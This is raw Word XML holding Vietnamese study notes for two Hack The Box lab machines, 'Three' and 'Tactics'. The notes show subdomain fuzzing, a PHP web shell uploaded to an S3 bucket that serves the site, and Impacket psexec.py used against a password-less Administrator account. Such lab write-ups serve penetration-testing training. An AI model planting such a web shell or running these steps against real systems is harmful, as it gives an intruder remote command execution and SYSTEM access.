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C5F73" w14:textId="09CEDEEC" w:rsidR="00782F3D" w:rsidRPr="00782F3D" w:rsidRDefault="00782F3D" w:rsidP="00782F3D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782F3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Three</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FBA831" w14:textId="77777777" w:rsidR="00782F3D" w:rsidRPr="00782F3D" w:rsidRDefault="00782F3D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D088423" w14:textId="1410C32D" w:rsidR="002F49FE" w:rsidRDefault="0071729B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6A46E3" wp14:editId="6DEC14F0">
            <wp:extent cx="5943600" cy="2626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2626995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20157466" w14:textId="721F228D" w:rsidR="000009F5" w:rsidRDefault="000009F5"/>
    <w:p w14:paraId="2F7D6F96" w14:textId="574E23E3" w:rsidR="000009F5" w:rsidRPr="000009F5" w:rsidRDefault="000009F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000009F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Subdomain Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC3A290" w14:textId="4B406C1E" w:rsidR="000009F5" w:rsidRDefault="000009F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018093D8" w14:textId="7295B1CB" w:rsidR="000009F5" w:rsidRDefault="000009F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000009F5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf -w ./subdomains-top1million-5000.txt -H "Host: FUZZ.thetoppers.htb" -u http://10.129.78.197 -c -mc 404</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D2A0AB" w14:textId="726ABDEC" w:rsidR="000009F5" w:rsidRDefault="000009F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0405060B" w14:textId="19D9540B" w:rsidR="000009F5" w:rsidRDefault="000009F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="163485BF" wp14:editId="0410F6D1">
            <wp:extent cx="5943600" cy="410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410845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4179F29A" w14:textId="2DBDEB69" w:rsidR="000009F5" w:rsidRDefault="000009F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69FCF787" w14:textId="466CE752" w:rsidR="000009F5" w:rsidRDefault="000009F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thêm “s3.thetoppers.htb ip” vào /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF31033" w14:textId="39C16572" w:rsidR="000009F5" w:rsidRDefault="000009F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5D95FD" w14:textId="4D45291C" w:rsidR="000009F5" w:rsidRDefault="00CA132F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E7B277A" wp14:editId="01C44C6B">
            <wp:extent cx="3356386" cy="88593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l="6702" t="17676" r="64474" b="70151"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3435967" cy="906938"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146EDF0" w14:textId="77777777" w:rsidR="00AD5878" w:rsidRDefault="00AD5878">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C12BB7B" w14:textId="0E1B6D84" w:rsidR="00CA132F" w:rsidRDefault="00AD5878">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Liệt kê tất cả s3 buckets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4ECBC" w14:textId="4922F710" w:rsidR="00CA132F" w:rsidRDefault="00883F13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08605900" wp14:editId="4EC2589A">
            <wp:extent cx="5943600" cy="531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531495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D09C9" w14:textId="3B1D5037" w:rsidR="00AD5878" w:rsidRDefault="00AD5878">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E9B32E8" w14:textId="77C0FE0B" w:rsidR="00AD5878" w:rsidRDefault="00AD5878">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Liệt kê các đối tượng trong 1 bucket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DED4A3" w14:textId="1C9041EA" w:rsidR="00AD5878" w:rsidRDefault="00AD5878">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653D7989" w14:textId="03059F59" w:rsidR="00AD5878" w:rsidRDefault="00BA76E7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="418A2F1B" wp14:editId="3EF2C894">
            <wp:extent cx="5943600" cy="871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871220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BEDB0C" w14:textId="79E61A4C" w:rsidR="00BA76E7" w:rsidRDefault="00BA76E7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8BDCA0" w14:textId="78CB6B9C" w:rsidR="00BA76E7" w:rsidRDefault="004B0238">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta thấy các tập tin index.php, .htaccess và 1 thư mục images trong bucket. Đây là webroot của trang web đang chạy trên cổng 80. Vì vậy máy chủ Apache đang dùng bucket này để lưu trữ trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC3A2E" w14:textId="3780CFF4" w:rsidR="004B0238" w:rsidRDefault="004B0238">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B683ED" w14:textId="6DB43121" w:rsidR="004B0238" w:rsidRDefault="004B0238">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>awscli có 1 tính năng khác cho phép chúng ta sao chép tập tin đến 1 bucket từ xa. Chúng ta biết ứng dụng dùng PHP. Chúng ta sẽ đăng tải php shell lên s3 bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C18B737" w14:textId="6F9AF32E" w:rsidR="004B0238" w:rsidRDefault="004B0238">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26701390" w14:textId="2433EB06" w:rsidR="006620D7" w:rsidRDefault="006620D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006620D7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?php echo system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC05C4" w14:textId="0C063714" w:rsidR="006620D7" w:rsidRDefault="006620D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657BABF1" w14:textId="7396AA7A" w:rsidR="006620D7" w:rsidRPr="006620D7" w:rsidRDefault="006620D7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006620D7">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761701FA" w14:textId="6BB3D72B" w:rsidR="006620D7" w:rsidRDefault="006620D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D52767E" w14:textId="4D49B9B4" w:rsidR="006620D7" w:rsidRDefault="006620D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chúng ta có thể kiểm tra shell đã tải lên chưa bằng cách chuyển hướng đến </w:t>
      </w:r>
      <w:r w:rsidRPr="006620D7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://thetoppers.htb/shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20661545" w14:textId="024701C3" w:rsidR="006620D7" w:rsidRDefault="006620D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791B3A8D" w14:textId="24A23394" w:rsidR="00782F3D" w:rsidRDefault="00782F3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA18503" w14:textId="6194B5F6" w:rsidR="00782F3D" w:rsidRPr="00782F3D" w:rsidRDefault="00782F3D" w:rsidP="00782F3D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00782F3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tactics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115853F" w14:textId="51A5846C" w:rsidR="00782F3D" w:rsidRDefault="00782F3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D60876" w14:textId="41EEC4B5" w:rsidR="00782F3D" w:rsidRDefault="0041746D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta thành công có được giao diện dòng lệnh SMB. Tuy nhiên, vì chúng ta có thể truy cập ADMIN$ share, chúng ta sẽ thử 1 công cụ psexec.py để khai thác lỗi cấu hình và có được shell của hệ thống. psexec.py là 1 phần của thư viện Impacket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFD3CE0" w14:textId="31155782" w:rsidR="0041746D" w:rsidRDefault="0041746D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACAF311" w14:textId="100EB5F9" w:rsidR="0041746D" w:rsidRDefault="0041746D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacket là 1 thư viện được viết bằng Python để làm việc với các giao thức mạng. </w:t>
      </w:r>
      <w:r w:rsidR="009062A4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Impacket chứa hàng chục công cụ tuyệt vời để tương tác với hệ thống và ứng dụng Windows, rất thích hợp để tấn công Windows và Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67B98C" w14:textId="6945EA27" w:rsidR="009062A4" w:rsidRDefault="009062A4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A34C025" w14:textId="2BAE74EC" w:rsidR="009062A4" w:rsidRDefault="009062A4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Một trong những công cụ được sử dụng nhiều nhất là psexec.py. Nó được đặt tên giống PsExec từ bộ Sysinternals của Microsoft vì nó thực hiện giống chức năng cho phép chúng ta thực thi 1 shell tương tác trên các máy Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC84000" w14:textId="434C17AB" w:rsidR="009062A4" w:rsidRDefault="009062A4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C08F79" w14:textId="65A3C454" w:rsidR="009062A4" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impacket tạo 1 dịch vụ từ xa bằng cách tải 1 tệp thực thi đặt tên ngẫu nhiên lên ADMIN$ share, sau đó đăng kí nó là dịch vụ Windows. Điều này sẽ giúp bạn có được 1 shell tương tác trên hệ thống Windows qua cổng TCP 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFB896" w14:textId="2E4925D0" w:rsidR="00D95A00" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473C75CD" w14:textId="0575EECA" w:rsidR="00D95A00" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Psexec yêu cầu thông tin đăng nhập của người dùng có đặc quyền cao để đọc/ghi vào chia sẻ ADMIN$. Khi bạn xác thực thành công, nó sẽ trả về cho bạn AUTHORITY\SYSTEM shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18566D10" w14:textId="46A2C2B3" w:rsidR="00D95A00" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D14163B" w14:textId="7F08180C" w:rsidR="00D95A00" w:rsidRPr="00CA2CE1" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2CE1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python psexec.py username:password@hostIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F8CB7" w14:textId="42165007" w:rsidR="00D95A00" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D08E6A5" w14:textId="66FC1243" w:rsidR="00D95A00" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vì người dùng Administrator không có mật khẩu. Chúng ta sẽ chạy lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55881A" w14:textId="3F533FA3" w:rsidR="00D95A00" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77BD2328" w14:textId="7C67AE49" w:rsidR="00D95A00" w:rsidRPr="00CA2CE1" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2CE1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>psexec.py administrator@10.10.10.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30961EB5" w14:textId="0A24C6B8" w:rsidR="00D95A00" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE846D4" w14:textId="77777777" w:rsidR="00D95A00" w:rsidRDefault="00D95A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37ED79CC" w14:textId="2C664F6B" w:rsidR="00B17259" w:rsidRDefault="00B17259">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C017A36" w14:textId="77777777" w:rsidR="00B17259" w:rsidRDefault="00B17259">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E58B2C" w14:textId="77777777" w:rsidR="006620D7" w:rsidRDefault="006620D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30488F9F" w14:textId="6ABA8A32" w:rsidR="006620D7" w:rsidRDefault="006620D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11548C4A" w14:textId="77777777" w:rsidR="006620D7" w:rsidRPr="000009F5" w:rsidRDefault="006620D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006620D7" w:rsidRPr="000009F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3AA03" w14:textId="77777777" w:rsidR="00A106BF" w:rsidRDefault="00A106BF" w:rsidP="00782F3D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="45131E25" w14:textId="77777777" w:rsidR="00A106BF" w:rsidRDefault="00A106BF" w:rsidP="00782F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D963E" w14:textId="77777777" w:rsidR="00A106BF" w:rsidRDefault="00A106BF" w:rsidP="00782F3D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="36C64656" w14:textId="77777777" w:rsidR="00A106BF" w:rsidRDefault="00A106BF" w:rsidP="00782F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254"/>
    <w:rsid w:val="000009F5"/>
    <w:rsid w:val="00144254"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0041746D"/>
    <w:rsid w:val="004B0238"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005A6024"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006620D7"/>
    <w:rsid w:val="0071729B"/>
    <w:rsid w:val="00782F3D"/>
    <w:rsid w:val="00814D9F"/>
    <w:rsid w:val="00883F13"/>
    <w:rsid w:val="009062A4"/>
    <w:rsid w:val="00A106BF"/>
    <w:rsid w:val="00AD5878"/>
    <w:rsid w:val="00B17259"/>
    <w:rsid w:val="00BA76E7"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C42610"/>
    <w:rsid w:val="00CA132F"/>
    <w:rsid w:val="00CA2CE1"/>
    <w:rsid w:val="00D95A00"/>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6422F5D4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FEE2C104-C216-C149-9E4F-5CCEDF524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Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00782F3D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
